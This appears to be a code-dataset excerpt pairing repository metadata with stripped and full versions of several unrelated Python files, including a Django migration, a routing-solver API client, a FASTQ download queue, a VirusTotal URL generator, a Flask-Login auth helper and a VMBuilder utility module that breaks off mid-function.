] | 1,316 | 2020-03-30T21:56:34.000Z | 2022-03-01T10:08:56.000Z | metecho/api/migrations/0103_alter_task_status.py | oddbird/MetaShare | 71fb667eaea6990e9d89be13d9a47e76db2a6c46 | [
"BSD-3-Clause"
] | 21 | 2020-07-21T11:58:47.000Z | 2021-11-25T00:48:21.000Z | # Generated by Django 3.2.2 on 2021-05-13 15:34
from django.db import migrations, models
from metecho.api.models import TaskStatus
| 28.680851 | 87 | 0.597181 | # Generated by Django 3.2.2 on 2021-05-13 15:34
from django.db import migrations, models
from metecho.api.models import TaskStatus
def set_task_canceled_statuses(apps, schema_editor):
    """Forward data migration: mark in-progress tasks whose PR exists but is
    closed as Canceled (per-row save keeps model signals/auto fields intact)."""
    Task = apps.get_model("api", "Task")
    stale_tasks = Task.objects.filter(
        status=TaskStatus.IN_PROGRESS, pr_is_open=False, pr_number__isnull=False
    )
    for task in stale_tasks:
        task.status = TaskStatus.CANCELED
        task.save()
def unset_task_canceled_statuses(apps, schema_editor):
    """Reverse data migration: put every Canceled task back to In Progress."""
    Task = apps.get_model("api", "Task")
    for task in Task.objects.filter(status=TaskStatus.CANCELED):
        task.status = TaskStatus.IN_PROGRESS
        task.save()
class Migration(migrations.Migration):
    """Add the 'Canceled' choice to Task.status and backfill existing rows."""
    dependencies = [
        ("api", "0102_merge_20210426_2054"),
    ]
    operations = [
        migrations.AlterField(
            model_name="task",
            name="status",
            field=models.CharField(
                choices=[
                    ("Planned", "Planned"),
                    ("In progress", "In Progress"),
                    ("Completed", "Completed"),
                    ("Canceled", "Canceled"),
                ],
                default="Planned",
                max_length=16,
            ),
        ),
        # Data step: flip closed-PR in-progress tasks to Canceled; reversible.
        migrations.RunPython(set_task_canceled_statuses, unset_task_canceled_statuses),
    ]
| 487 | 656 | 69 |
ae0e727020da9082f868380f9e604cec3980a139 | 3,278 | py | Python | kangrouter.py | TheSolvingMachine/kangrouter-py | 0e385372675978ad7f6c4e8daea54401564304b2 | [
"Apache-2.0"
] | 1 | 2017-11-07T22:36:24.000Z | 2017-11-07T22:36:24.000Z | kangrouter.py | TheSolvingMachine/kangrouter-py | 0e385372675978ad7f6c4e8daea54401564304b2 | [
"Apache-2.0"
] | null | null | null | kangrouter.py | TheSolvingMachine/kangrouter-py | 0e385372675978ad7f6c4e8daea54401564304b2 | [
"Apache-2.0"
] | null | null | null | import time
from tsm.common.app import exception
import requests
import json
from requests.packages.urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter
KANGROUTER_WEBSERVICE_APPLICATION_ROOT="/kangrouter/srv/v1"
| 33.44898 | 70 | 0.599451 | import time
from tsm.common.app import exception
import requests
import json
from requests.packages.urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter
KANGROUTER_WEBSERVICE_APPLICATION_ROOT="/kangrouter/srv/v1"
class KangRouterClient:
  """Thin HTTP client for the KangRouter solver REST API.

  Every method maps to one endpoint under ``pathbase``; HTTP error
  responses are translated into project exceptions by
  :meth:`validateReply`.  Requests to the service root are retried up to
  5 times with exponential back-off.
  """
  pathbase = "https://thesolvingmachine.com/kangrouter/srv/v1/solvers"
  def __init__(self,apiKey,licenseId):
    """Store auth headers/params and build a retrying requests session."""
    self.headers = {"content-type": "application/json",
                    "Authorization": apiKey}
    self.params = {"licenseId" : licenseId }
    retries = Retry(total=5,
                    backoff_factor=0.75)
    self.session = requests.Session()
    self.session.mount(KANGROUTER_WEBSERVICE_APPLICATION_ROOT,
                       HTTPAdapter(max_retries=retries))
  def validateReply(self,req):
    """Raise a project exception for an error response; no-op on success.

    NOTE(review): the guard only covers status codes 400..500, so 5xx
    codes above 500 (e.g. 502/503) fall through silently -- confirm
    whether ``<= 500`` was meant to be ``< 600``.
    """
    if req.status_code >= 400 and req.status_code <= 500:
      try:
        j = req.json()  # parsed only to check the body is valid JSON
      except ValueError:
        raise exception.InternalError(req.text,req.status_code)
      raise exception.jsonToException(req.json())
  def create(self,problem,**kwargs):
    """POST a new solver for *problem*; returns the solver id (text body)."""
    path = self.pathbase
    payload=json.dumps(problem)
    params = self.params.copy()
    params.update(kwargs)
    req = self.session.post(path,
                            params=params,
                            headers=self.headers,
                            data=payload)
    self.validateReply(req)
    return req.text
  def delete(self,solverId):
    """Delete the given solver; returns True on success."""
    path = "{base}/{solverId}".format(base=self.pathbase,
                                      solverId=str(solverId))
    req = self.session.delete(path,
                              params=self.params,
                              headers=self.headers)
    self.validateReply(req)
    return True
  def stop(self,solverId):
    """Ask the given solver to stop; returns True on success."""
    path = "{base}/{solverId}/stop".format(base=self.pathbase,
                                           solverId=str(solverId))
    req = self.session.put(path,
                           params=self.params,
                           headers=self.headers)
    self.validateReply(req)
    return True
  def getStatus(self,solverId):
    """Return the solver's status document (parsed JSON)."""
    path = "{base}/{solverId}/status".format(base=self.pathbase,
                                             solverId=str(solverId))
    req = self.session.get(path,
                           params=self.params,
                           headers=self.headers)
    self.validateReply(req)
    return req.json()
  def getSolution(self,solverId):
    """Return the solver's solution document (parsed JSON)."""
    path = "{base}/{solverId}/solution".format(base=self.pathbase,
                                               solverId=str(solverId))
    req = self.session.get(path,
                           params=self.params,
                           headers=self.headers)
    self.validateReply(req)
    return req.json()
  # polling
  def createAndWait(self,problem,cancel,**kwargs):
    """Create a solver and poll it once per second, up to 300 s.

    :param cancel: zero-argument callable; polling stops when it returns True.
    :raises exception.solverError: if the solver reports the problem invalid.
    :raises exception.InternalError: on timeout.
    :raises exception.UserCancelled: if *cancel* fired before completion.
    """
    solverId = self.create(problem,**kwargs)
    timeout = 300
    while not cancel() and timeout>0:
      status = self.getStatus(solverId)
      if status["execStatus"] =="invalid":
        raise exception.solverError(json.dumps(status["errors"]))
      if status["execStatus"] =="completed":
        return self.getSolution(solverId)
      time.sleep(1)
      timeout -= 1
    if timeout == 0:
      raise exception.InternalError("Timed out waiting for solver")
    raise exception.UserCancelled()
| 2,706 | 301 | 23 |
06345111138d441a5b029be39d16a41e55a74520 | 5,728 | py | Python | enCount/fastqs.py | mstrazar/enCount | dcff565ce96afe37aa8a41995637d00cce02360d | [
"MIT"
] | null | null | null | enCount/fastqs.py | mstrazar/enCount | dcff565ce96afe37aa8a41995637d00cce02360d | [
"MIT"
] | null | null | null | enCount/fastqs.py | mstrazar/enCount | dcff565ce96afe37aa8a41995637d00cce02360d | [
"MIT"
] | null | null | null | import os
import shutil
import requests
import hashlib
import tempfile
import datetime
from bson.objectid import ObjectId
import enCount
# populate list with currently queued jobs
submitted_downloads = dict(
(j.meta['file_path'], j) for j in enCount.queues.downloads.jobs
)
def get_file_path(e_acc, f_acc, f_url, f_size, f_md5):
"""Return path to file or None if file not available."""
# query DB
hits = enCount.db.fastqs.find(
{'e_acc': e_acc, 'f_acc': f_acc, 'url': f_url, 'size': f_size,
'md5': f_md5}
)
assert(hits.count() <= 1)
hits = list(hits)
if hits:
# fetch record from DB
hit = hits[0]
if hit['status'] == 'ready':
return hit['file_path']
else:
# not ready
return
else:
# add new record into database
fname = '{:s}.fastq.gz'.format(f_acc)
rel_folder = "{:s}".format(e_acc)
file_path = os.path.join(rel_folder, fname)
time_stamp = datetime.datetime.utcnow()
new_rec = {
'e_acc': e_acc, 'f_acc': f_acc, 'url': f_url, 'size': f_size,
'md5': f_md5, 'file_path': file_path, 'status': 'to download',
'time_stamp': time_stamp
}
print('adding new record to fastqs collection: {:s}'.format(
str(new_rec)))
enCount.db.fastqs.insert_one(new_rec)
# not ready
return
def process():
"""Synchronizes database and queue of current download jobs."""
global submitted_downloads
# query DB to get all records that have status 'to download'
for e in enCount.db.fastqs.find({'status': 'to download'}):
file_path = e['file_path']
dbrec_id = str(e['_id'])
# queue new files to download
if file_path not in submitted_downloads:
f_url = e['url']
f_md5 = e['md5']
f_size = e['size']
e_acc = e['e_acc']
print('queuing download from {:s}'.format(f_url))
# make sure folder exists before download starts
rel_folder = "{:s}".format(e_acc)
abs_folder = os.path.join(enCount.config.data_root, rel_folder)
if not os.path.isdir(abs_folder):
try:
os.makedirs(abs_folder)
except:
print('Error, could not create download folder: '
'{:s}'.format(abs_folder))
print(' file {:s} will not be '
'downloaded.'.format(file_path))
# error, will not be ready
return
job = enCount.queues.downloads.enqueue_call(
enCount.fastqs.download,
args=(f_url, file_path, f_md5, f_size, dbrec_id),
result_ttl=-1, ttl=-1, timeout=-1,
)
job.meta['file_path'] = file_path
job.save()
submitted_downloads[file_path] = job
# clean queue for finished downloads
for job in enCount.queues.downloads.jobs:
if job.is_finished or job.is_failed:
job.cleanup()
enCount.queues.downloads.remove(job)
| 34.506024 | 78 | 0.59602 | import os
import shutil
import requests
import hashlib
import tempfile
import datetime
from bson.objectid import ObjectId
import enCount
# populate list with currently queued jobs
submitted_downloads = dict(
(j.meta['file_path'], j) for j in enCount.queues.downloads.jobs
)
def _update_dbrec_status(dbrec_id, new_status):
    """Set the ``status`` field of the fastqs record with id *dbrec_id*."""
    print(dbrec_id)
    result = enCount.db.fastqs.update_one(
        {'_id': ObjectId(dbrec_id)}, {"$set": {'status': new_status}}
    )
    # Exactly one document should have matched and been modified.
    update_failed = (result.matched_count != 1
                     or result.modified_count != 1
                     or not result.acknowledged)
    if update_failed:
        print(' problems updating collection fastqs record id: {:s}, '
              'match count {:d}, modified count {:d}'.format(
                  dbrec_id, result.matched_count, result.modified_count)
        )
def download(url, file_path, expected_md5, expected_size, dbrec_id,
             chunk_size=500000):
    """Stream *url* into ``data_root``/*file_path* and verify it.

    The payload is written to a temporary file while its MD5 and size are
    computed on the fly; only a verified file is moved into place.  The
    matching ``fastqs`` record (*dbrec_id*) is updated with the outcome.

    :param url: source URL.
    :param file_path: destination path relative to ``enCount.config.data_root``.
    :param expected_md5: hex digest the download must match.
    :param expected_size: byte size the download must match.
    :param dbrec_id: id of the fastqs DB record to update.
    :param chunk_size: streaming chunk size in bytes.
    :returns: *url* on success, ``None`` on any verification/move failure.
    """
    print('Downloading from: {:s}'.format(url))
    print(' expected md5: {:s}'.format(expected_md5))
    print(' expected size: {:d}'.format(expected_size))
    print(' will update fastqs record id: {:s}'.format(dbrec_id))
    # determine absolute path to where store downloaded file
    abs_file_path = os.path.join(enCount.config.data_root, file_path)
    # download
    file_md5 = hashlib.md5()
    file_size = 0
    tmp_fd, temp_filename = tempfile.mkstemp(
        prefix='{:s}'.format(os.path.basename(file_path)), suffix='.download',
        dir=enCount.config.tmp_root
    )
    # BUGFIX: mkstemp returns an open OS-level descriptor that the original
    # code discarded, leaking one fd per download.  Close it here; the file
    # is re-opened by name below.
    os.close(tmp_fd)
    print(' temporary download file: {:s}'.format(temp_filename))
    r = requests.get(url, stream=True, timeout=3600)
    with open(temp_filename, 'wb') as fd:
        for chunk in r.iter_content(chunk_size):
            # write to file
            fd.write(chunk)
            # update md5 and size incrementally
            file_md5.update(chunk)
            file_size += len(chunk)
    file_md5 = file_md5.hexdigest()
    print(' size of downloaded file: {:d}'.format(file_size))
    print(' md5 of downloaded file: {:s}'.format(file_md5))
    # check for errors in md5 or size
    if expected_md5 != file_md5:
        print('ERROR, md5 of downloaded file not as expected.')
        _update_dbrec_status(dbrec_id, 'error - md5 mismatch')
        os.remove(temp_filename)
        return
    if expected_size != file_size:
        print('ERROR, size of downloaded file not as expected.')
        _update_dbrec_status(dbrec_id, 'error - file size mismatch')
        os.remove(temp_filename)
        return
    # move file to proper name
    print('saving to file: {:s}'.format(abs_file_path))
    try:
        shutil.move(temp_filename, abs_file_path)
    except FileNotFoundError:
        print('ERROR, file could not be saved to target folder')
        os.remove(temp_filename)
        return
    # update database
    _update_dbrec_status(dbrec_id, 'ready')
    print('done')
    return url
def get_file_path(e_acc, f_acc, f_url, f_size, f_md5):
    """Return path to file or None if file not available.

    Looks the (experiment, file, url, size, md5) tuple up in the ``fastqs``
    collection.  If a matching record exists and its download finished
    ('ready'), the stored relative path is returned; otherwise a
    'to download' record is created (picked up later by :func:`process`)
    and ``None`` is returned implicitly.
    """
    # query DB
    hits = enCount.db.fastqs.find(
        {'e_acc': e_acc, 'f_acc': f_acc, 'url': f_url, 'size': f_size,
         'md5': f_md5}
    )
    # The query key is expected to be unique across the collection.
    assert(hits.count() <= 1)
    hits = list(hits)
    if hits:
        # fetch record from DB
        hit = hits[0]
        if hit['status'] == 'ready':
            return hit['file_path']
        else:
            # not ready (still downloading or failed)
            return
    else:
        # add new record into database
        fname = '{:s}.fastq.gz'.format(f_acc)
        rel_folder = "{:s}".format(e_acc)
        file_path = os.path.join(rel_folder, fname)
        time_stamp = datetime.datetime.utcnow()
        new_rec = {
            'e_acc': e_acc, 'f_acc': f_acc, 'url': f_url, 'size': f_size,
            'md5': f_md5, 'file_path': file_path, 'status': 'to download',
            'time_stamp': time_stamp
        }
        print('adding new record to fastqs collection: {:s}'.format(
            str(new_rec)))
        enCount.db.fastqs.insert_one(new_rec)
        # not ready
        return
def process():
    """Synchronizes database and queue of current download jobs.

    Enqueues a download job for every 'to download' fastqs record that is
    not queued yet (creating the destination folder first) and prunes
    finished/failed jobs from the RQ downloads queue.
    """
    global submitted_downloads
    # query DB to get all records that have status 'to download'
    for e in enCount.db.fastqs.find({'status': 'to download'}):
        file_path = e['file_path']
        dbrec_id = str(e['_id'])
        # queue new files to download
        if file_path not in submitted_downloads:
            f_url = e['url']
            f_md5 = e['md5']
            f_size = e['size']
            e_acc = e['e_acc']
            print('queuing download from {:s}'.format(f_url))
            # make sure folder exists before download starts
            rel_folder = "{:s}".format(e_acc)
            abs_folder = os.path.join(enCount.config.data_root, rel_folder)
            if not os.path.isdir(abs_folder):
                try:
                    os.makedirs(abs_folder)
                # NOTE(review): bare except hides every error type here;
                # catching OSError would be safer -- confirm before changing.
                except:
                    print('Error, could not create download folder: '
                          '{:s}'.format(abs_folder))
                    print(' file {:s} will not be '
                          'downloaded.'.format(file_path))
                    # error, will not be ready
                    # NOTE(review): this `return` aborts the whole scan, so
                    # records after the failing one are never queued --
                    # `continue` looks intended; confirm.
                    return
            # Unbounded TTLs: the job and its result never expire.
            job = enCount.queues.downloads.enqueue_call(
                enCount.fastqs.download,
                args=(f_url, file_path, f_md5, f_size, dbrec_id),
                result_ttl=-1, ttl=-1, timeout=-1,
            )
            job.meta['file_path'] = file_path
            job.save()
            submitted_downloads[file_path] = job
    # clean queue for finished downloads
    for job in enCount.queues.downloads.jobs:
        if job.is_finished or job.is_failed:
            job.cleanup()
            enCount.queues.downloads.remove(job)
| 2,488 | 0 | 46 |
2a9b9fac2b90d7be9b56fb00bbe59ce86f2c68ac | 335 | py | Python | VT_gen_urls.py | sparklingSky/vt-gen-urls | fb0d23caa5c47627363ac8db0e4aa7f12d794a41 | [
"MIT"
] | 1 | 2017-04-27T06:54:08.000Z | 2017-04-27T06:54:08.000Z | VT_gen_urls.py | sparklingSky/vt-gen-urls | fb0d23caa5c47627363ac8db0e4aa7f12d794a41 | [
"MIT"
] | null | null | null | VT_gen_urls.py | sparklingSky/vt-gen-urls | fb0d23caa5c47627363ac8db0e4aa7f12d794a41 | [
"MIT"
] | null | null | null | __author__ = 'sparklingSky'
import ipcalc
f = open('VT_links.txt', 'w')
subnet = raw_input('Enter subnet with prefix in format 1.2.3.0/24: ')
for x in ipcalc.Network(subnet):
f.write('https://www.virustotal.com/en/ip-address/' + str(x) + '/information/' + '\n')
f.close()
print 'Completed. See the result in file VT_links.txt'
| 25.769231 | 90 | 0.683582 | __author__ = 'sparklingSky'
import ipcalc
f = open('VT_links.txt', 'w')
subnet = raw_input('Enter subnet with prefix in format 1.2.3.0/24: ')
for x in ipcalc.Network(subnet):
f.write('https://www.virustotal.com/en/ip-address/' + str(x) + '/information/' + '\n')
f.close()
print 'Completed. See the result in file VT_links.txt'
| 0 | 0 | 0 |
2ce45fac8db13d29869dc715eb1b786c4b40a0a5 | 4,051 | py | Python | navycut/contrib/auth/__init__.py | navycut/navycut | 1d49621105c7c4683d52a3d2c853ae7165b9dc0d | [
"MIT"
] | 13 | 2021-04-26T04:00:36.000Z | 2021-09-18T19:57:58.000Z | navycut/contrib/auth/__init__.py | FlaskAio/navycut | 40f378f1710a26645df8d726c4d1caf33097da50 | [
"MIT"
] | 21 | 2021-09-27T03:19:21.000Z | 2022-03-31T03:20:59.000Z | navycut/contrib/auth/__init__.py | FlaskAio/navycut | 40f378f1710a26645df8d726c4d1caf33097da50 | [
"MIT"
] | 7 | 2021-07-21T06:21:55.000Z | 2021-09-02T17:58:04.000Z | from flask_login import (
LoginManager as _LoginManager,
logout_user as _logout_user,
login_user as _login_user
)
from .models import User
from navycut.utils.security import check_password_hash
from navycut.errors.misc import DataTypeMismatchError
from .decorators import (
login_required as login_required,
group_required as group_required,
)
import typing as t
if t.TYPE_CHECKING:
from navycut.core.app_config import Navycut
from datetime import timedelta
from .models import User
login_manager = _LoginManager()
@login_manager.user_loader
def login_user(user:t.Type["User"],
remember:bool=False,
duration:t.Optional[t.Type["timedelta"]]=None,
force:bool=False,
fresh:bool=True
) -> bool:
"""
Logs a user in. You should pass the actual user object to this. If the
user's `is_active` property is ``False``, they will not be logged in
unless `force` is ``True``.
This will return ``True`` if the log in attempt succeeds, and ``False`` if
it fails (i.e. because the user is inactive).
:param user: The user object to log in.
:type user: object
:param remember: Whether to remember the user after their session expires.
Defaults to ``False``.
:type remember: bool
:param duration: The amount of time before the remember cookie expires. If
``None`` the value set in the settings is used. Defaults to ``None``.
:type duration: :class:`datetime.timedelta`
:param force: If the user is inactive, setting this to ``True`` will log
them in regardless. Defaults to ``False``.
:type force: bool
:param fresh: setting this to ``False`` will log in the user with a session
marked as not "fresh". Defaults to ``True``.
:type fresh: bool
"""
return _login_user(user, remember=remember, duration=duration, force=force, fresh=fresh)
def logout_user() -> bool:
"""
Logs a user out. (You do not need to pass the actual user.)
This will also clean up the remember me cookie if it exists.
"""
return _logout_user()
def authenticate(username:str, password:str) -> t.Optional["User"]:
"""
The default authentication method to authenticate a user in Navycut.
:param username:
The username for authentication.
:param password:
the original password for the given user.
example::
from navycut.auth import authenticate
user = authenticate(username="jhon", password="password")
"""
user = User.query.filter_by(username=username).first()
if not user is None:
if not check_password_hash(user.password, password):
return None
return user
def has_group(user: t.Type["User"],
group:t.Union[t.List[str], str]
) -> bool:
"""
check a user have the provided group or not.
:param user:
the user object.
:param group:
the group you want to check.
example::
from navycut.contrib.auth import has_group
from navycut.contrib.auth.models import user
user = User.query.get(1)
is_group_present = has_group(user, 'super_admin')
"""
user_groups_name = [group.name for group in list(user.groups)]
if isinstance(group, str):
return group in user_groups_name
elif isinstance(group, list):
for grp in group:
if grp in user_groups_name:
return True
return False
else:
raise DataTypeMismatchError(group, "has_group function", "str or list") | 31.161538 | 92 | 0.646013 | from flask_login import (
LoginManager as _LoginManager,
logout_user as _logout_user,
login_user as _login_user
)
from .models import User
from navycut.utils.security import check_password_hash
from navycut.errors.misc import DataTypeMismatchError
from .decorators import (
login_required as login_required,
group_required as group_required,
)
import typing as t
if t.TYPE_CHECKING:
from navycut.core.app_config import Navycut
from datetime import timedelta
from .models import User
class LoginManager(_LoginManager):
    """Navycut subclass of :class:`flask_login.LoginManager`.

    Adds no behaviour beyond the base class yet; the commented-out
    ``login_view`` hints at a planned default login route.
    NOTE(review): the module-level ``login_manager`` instance is built from
    ``_LoginManager`` directly, so this subclass currently appears unused --
    confirm before removing.
    """
    def __init__(self,
                app:t.Type["Navycut"]=None,
                add_context_processor:bool=True
                ) -> None:
        super(LoginManager, self).__init__(app=app,
                            add_context_processor=add_context_processor)
        # self. login_view = "/login/"
login_manager = _LoginManager()
@login_manager.user_loader
def load_user(user_id) -> t.Type["User"]:
    """Flask-Login user-loader callback: reload the session's user by id."""
    return User.query.get(int(user_id))
def login_user(user:t.Type["User"],
remember:bool=False,
duration:t.Optional[t.Type["timedelta"]]=None,
force:bool=False,
fresh:bool=True
) -> bool:
"""
Logs a user in. You should pass the actual user object to this. If the
user's `is_active` property is ``False``, they will not be logged in
unless `force` is ``True``.
This will return ``True`` if the log in attempt succeeds, and ``False`` if
it fails (i.e. because the user is inactive).
:param user: The user object to log in.
:type user: object
:param remember: Whether to remember the user after their session expires.
Defaults to ``False``.
:type remember: bool
:param duration: The amount of time before the remember cookie expires. If
``None`` the value set in the settings is used. Defaults to ``None``.
:type duration: :class:`datetime.timedelta`
:param force: If the user is inactive, setting this to ``True`` will log
them in regardless. Defaults to ``False``.
:type force: bool
:param fresh: setting this to ``False`` will log in the user with a session
marked as not "fresh". Defaults to ``True``.
:type fresh: bool
"""
return _login_user(user, remember=remember, duration=duration, force=force, fresh=fresh)
def logout_user() -> bool:
"""
Logs a user out. (You do not need to pass the actual user.)
This will also clean up the remember me cookie if it exists.
"""
return _logout_user()
def authenticate(username:str, password:str) -> t.Optional["User"]:
"""
The default authentication method to authenticate a user in Navycut.
:param username:
The username for authentication.
:param password:
the original password for the given user.
example::
from navycut.auth import authenticate
user = authenticate(username="jhon", password="password")
"""
user = User.query.filter_by(username=username).first()
if not user is None:
if not check_password_hash(user.password, password):
return None
return user
def has_group(user: t.Type["User"],
group:t.Union[t.List[str], str]
) -> bool:
"""
check a user have the provided group or not.
:param user:
the user object.
:param group:
the group you want to check.
example::
from navycut.contrib.auth import has_group
from navycut.contrib.auth.models import user
user = User.query.get(1)
is_group_present = has_group(user, 'super_admin')
"""
user_groups_name = [group.name for group in list(user.groups)]
if isinstance(group, str):
return group in user_groups_name
elif isinstance(group, list):
for grp in group:
if grp in user_groups_name:
return True
return False
else:
raise DataTypeMismatchError(group, "has_group function", "str or list") | 357 | 13 | 71 |
b83c60d4492dc1f05faf5d5bbad4a6170cee1206 | 8,027 | py | Python | src/vm-builder-0.12.4+bzr489/build/lib.linux-x86_64-2.7/VMBuilder/util.py | cryptorinium/Num2 | e83ea5b18b7822c73699de2a667d189791c48fbb | [
"MIT"
] | null | null | null | src/vm-builder-0.12.4+bzr489/build/lib.linux-x86_64-2.7/VMBuilder/util.py | cryptorinium/Num2 | e83ea5b18b7822c73699de2a667d189791c48fbb | [
"MIT"
] | null | null | null | src/vm-builder-0.12.4+bzr489/build/lib.linux-x86_64-2.7/VMBuilder/util.py | cryptorinium/Num2 | e83ea5b18b7822c73699de2a667d189791c48fbb | [
"MIT"
] | null | null | null | #
# Uncomplicated VM Builder
# Copyright (C) 2007-2009 Canonical Ltd.
#
# See AUTHORS for list of contributors
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Various utility functions
import ConfigParser
import errno
import fcntl
import logging
import os.path
import select
import subprocess
import tempfile
from exception import VMBuilderException, VMBuilderUserError
def run_cmd(*argv, **kwargs):
    """
    Runs a command.
    Locale is reset to C to make parsing error messages possible.
    @type stdin: string
    @param stdin: input to provide to the process on stdin. If None, process'
    stdin will be attached to /dev/null
    @type ignore_fail: boolean
    @param ignore_fail: If True, a non-zero exit code from the command will not
    cause an exception to be raised.
    @type env: dict
    @param env: Dictionary of extra environment variables to set in the new process
    @rtype: string
    @return: string containing the stdout of the process
    """
    env = kwargs.get('env', {})
    stdin = kwargs.get('stdin', None)
    ignore_fail = kwargs.get('ignore_fail', False)
    # Stringify every positional argument so callers may pass ints, paths, etc.
    args = [str(arg) for arg in argv]
    logging.debug(args.__repr__())
    if stdin:
        logging.debug('stdin was set and it was a string: %s' % (stdin,))
        stdin_arg = subprocess.PIPE
    else:
        # Python 2 builtin file(); child sees immediate EOF on stdin.
        stdin_arg = file('/dev/null', 'r')
    # Force the C locale so the child's error messages are parseable.
    proc_env = dict(os.environ)
    proc_env['LANG'] = 'C'
    proc_env['LC_ALL'] = 'C'
    proc_env.update(env)
    try:
        proc = subprocess.Popen(args, stdin=stdin_arg, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=proc_env)
    except OSError, error:
        if error.errno == errno.ENOENT:
            raise VMBuilderUserError, "Couldn't find the program '%s' on your system" % (argv[0])
        else:
            raise VMBuilderUserError, "Couldn't launch the program '%s': %s" % (argv[0], error)
    if stdin:
        proc.stdin.write(stdin)
        proc.stdin.close()
    # Drain stdout and stderr concurrently (non-blocking reads + select) so the
    # child cannot deadlock by filling one pipe buffer while we read the other.
    # NOTE(review): NonBlockingFile is referenced but not defined in this copy
    # of the module — it appears to have been stripped; confirm against upstream.
    mystdout = NonBlockingFile(proc.stdout, logfunc=logging.debug)
    mystderr = NonBlockingFile(proc.stderr, logfunc=(ignore_fail and logging.debug or logging.info))
    while not (mystdout.closed and mystderr.closed):
        # Block until either of them has something to offer
        fds = select.select([x.file for x in [mystdout, mystderr] if not x.closed], [], [])[0]
        for fp in [mystderr, mystdout]:
            if fp.file in fds:
                fp.process_input()
    status = proc.wait()
    if not ignore_fail and status != 0:
        raise VMBuilderException, "Process (%s) returned %d. stdout: %s, stderr: %s" % (args.__repr__(), status, mystdout.buf, mystderr.buf)
    return mystdout.buf
def checkroot():
    """Abort with a user error unless the effective UID is root."""
    euid = os.geteuid()
    if euid != 0:
        raise VMBuilderUserError("This script must be run as root (e.g. via sudo)")
def set_up_tmpfs(tmp_root=None, size=1024):
    """Mount a fresh tmpfs of `size` MB under a new directory in `tmp_root`.

    `tmp_root` defaults to tempfile.gettempdir(). Returns the mount point.
    """
    target = tmpdir('tmpfs', tmp_root)
    cmd = [
        "mount", "-t", "tmpfs",
        "-o", "size=%dM,mode=0770" % int(size),
        "tmpfs", target,
    ]
    logging.info('Mounting tmpfs under %s' % target)
    logging.debug('Executing: %s' % cmd)
    run_cmd(*cmd)
    return target
def clean_up_tmpfs(mount_point):
    """Detach the tmpfs previously mounted at `mount_point`."""
    cmd = ["umount", "-t", "tmpfs", mount_point]
    logging.info('Unmounting tmpfs from %s' % mount_point)
    logging.debug('Executing: %s' % cmd)
    run_cmd(*cmd)
| 35.052402 | 140 | 0.639342 | #
# Uncomplicated VM Builder
# Copyright (C) 2007-2009 Canonical Ltd.
#
# See AUTHORS for list of contributors
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Various utility functions
import ConfigParser
import errno
import fcntl
import logging
import os.path
import select
import subprocess
import tempfile
from exception import VMBuilderException, VMBuilderUserError
class NonBlockingFile(object):
    """Wrap a pipe file object in non-blocking mode, accumulating its output.

    Used by run_cmd to drain a child process' stdout/stderr without
    deadlocking: `buf` collects everything read, while complete lines are
    forwarded to `logfunc` as they arrive.
    """
    def __init__(self, fp, logfunc):
        # fp: a readable file object backed by a real fd (e.g. a subprocess pipe)
        self.file = fp
        self.set_non_blocking()
        self.buf = ''       # everything read so far
        self.logbuf = ''    # trailing partial line not yet handed to logfunc
        self.logfunc = logfunc
    def set_non_blocking(self):
        """Switch the underlying fd to O_NONBLOCK so reads never stall."""
        flags = fcntl.fcntl(self.file, fcntl.F_GETFL)
        flags = flags | os.O_NONBLOCK
        fcntl.fcntl(self.file, fcntl.F_SETFL, flags)
    def __getattr__(self, attr):
        # Delegate only 'closed' to the wrapped file; any other missing
        # attribute is a genuine error.
        if attr == 'closed':
            return self.file.closed
        else:
            raise AttributeError()
    def process_input(self):
        """Read whatever is available; on EOF close and flush the log buffer."""
        data = self.file.read()
        if data == '':
            # An empty read on a select()-readable fd means EOF.
            self.file.close()
            if self.logbuf:
                self.logfunc(self.logbuf)
        else:
            self.buf += data
            self.logbuf += data
            # Emit every complete line to the log function.
            while '\n' in self.logbuf:
                line, self.logbuf = self.logbuf.split('\n', 1)
                self.logfunc(line)
def run_cmd(*argv, **kwargs):
    """
    Runs a command.
    Locale is reset to C to make parsing error messages possible.
    @type stdin: string
    @param stdin: input to provide to the process on stdin. If None, process'
    stdin will be attached to /dev/null
    @type ignore_fail: boolean
    @param ignore_fail: If True, a non-zero exit code from the command will not
    cause an exception to be raised.
    @type env: dict
    @param env: Dictionary of extra environment variables to set in the new process
    @rtype: string
    @return: string containing the stdout of the process
    """
    env = kwargs.get('env', {})
    stdin = kwargs.get('stdin', None)
    ignore_fail = kwargs.get('ignore_fail', False)
    # Stringify every positional argument so callers may pass ints, paths, etc.
    args = [str(arg) for arg in argv]
    logging.debug(args.__repr__())
    if stdin:
        logging.debug('stdin was set and it was a string: %s' % (stdin,))
        stdin_arg = subprocess.PIPE
    else:
        # Python 2 builtin file(); child sees immediate EOF on stdin.
        stdin_arg = file('/dev/null', 'r')
    # Force the C locale so the child's error messages are parseable.
    proc_env = dict(os.environ)
    proc_env['LANG'] = 'C'
    proc_env['LC_ALL'] = 'C'
    proc_env.update(env)
    try:
        proc = subprocess.Popen(args, stdin=stdin_arg, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=proc_env)
    except OSError, error:
        if error.errno == errno.ENOENT:
            raise VMBuilderUserError, "Couldn't find the program '%s' on your system" % (argv[0])
        else:
            raise VMBuilderUserError, "Couldn't launch the program '%s': %s" % (argv[0], error)
    if stdin:
        proc.stdin.write(stdin)
        proc.stdin.close()
    # Drain stdout and stderr concurrently (non-blocking reads + select) so the
    # child cannot deadlock by filling one pipe buffer while we read the other.
    mystdout = NonBlockingFile(proc.stdout, logfunc=logging.debug)
    mystderr = NonBlockingFile(proc.stderr, logfunc=(ignore_fail and logging.debug or logging.info))
